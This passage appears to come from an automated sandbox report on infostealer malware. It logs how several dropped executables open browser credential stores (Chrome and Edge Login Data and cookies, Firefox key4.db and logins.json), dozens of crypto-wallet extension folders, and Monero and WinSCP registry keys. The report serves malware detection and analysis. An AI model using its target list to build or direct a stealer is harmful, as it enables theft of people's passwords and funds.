Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*t'V
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
